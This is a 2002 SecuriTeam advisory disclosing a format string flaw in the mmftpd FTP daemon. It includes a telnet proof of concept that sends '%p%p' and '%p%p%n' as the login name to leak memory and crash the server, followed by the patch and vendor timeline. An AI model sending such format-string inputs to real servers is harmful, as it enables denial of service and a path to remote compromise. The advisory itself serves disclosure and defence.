[UNIX] mmftpd FTP Daemon Format String Vulnerability

From: support@securiteam.com
Date: 06/13/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 13 Jun 2002 07:34:27 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  mmftpd FTP Daemon Format String Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://freshmeat.net/projects/mmftpd/> mmftpd is a secure FTP server
that runs as a normal user, and supports virtual users only. Each user may
have specific permissions, including the maximum home directory size limit
and download/upload speeds. It runs on both BSD and Linux systems, and is
ideal for a setup with many Web virtual host customers. It was written
from scratch, with no borrowed code.

The Laboratory intexxia found a remotely exploitable format string
vulnerability in the mmftpd FTP daemon.

DETAILS

Vulnerable systems:
 * mmftpd version 0.0.7 and prior

Immune systems:
 * mmftpd version 0.0.8

There is a format string vulnerability in the 'mmsyslog()' function of the
'mmftpd ' program. This function acts like 'vsyslog()' if '__GLIBC__' is
defined. It calls the 'syslog(3)' function with a format string that can
be defined by a remote user. It is not necessary to authenticate to
exploit this vulnerability.

Successful exploitation of this flaw can allow a remote user to obtain a
local account on the target machine.

Proof of concept:
test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p
331 Password required for this user
PASS foo
530 Invalid login

In the log file :
mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused

Solution:
The following patch corrects this issue:

diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
- --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun 4 11:25:03 2002
@@ -70,7 +70,7 @@
  va_start(lst, fmt);
  vsnprintf(buf, 1023, fmt, lst);
  va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
     }
 }

A new version including this patch is available at the following URL:
<http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz>
http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz

Vendor status:
04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew was very reactive and confirmed the vulnerability. He
released a new version.

ADDITIONAL INFORMATION

The information has been provided by <mailto:benoit.roussel@intexxia.com>
Benoît Roussel.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages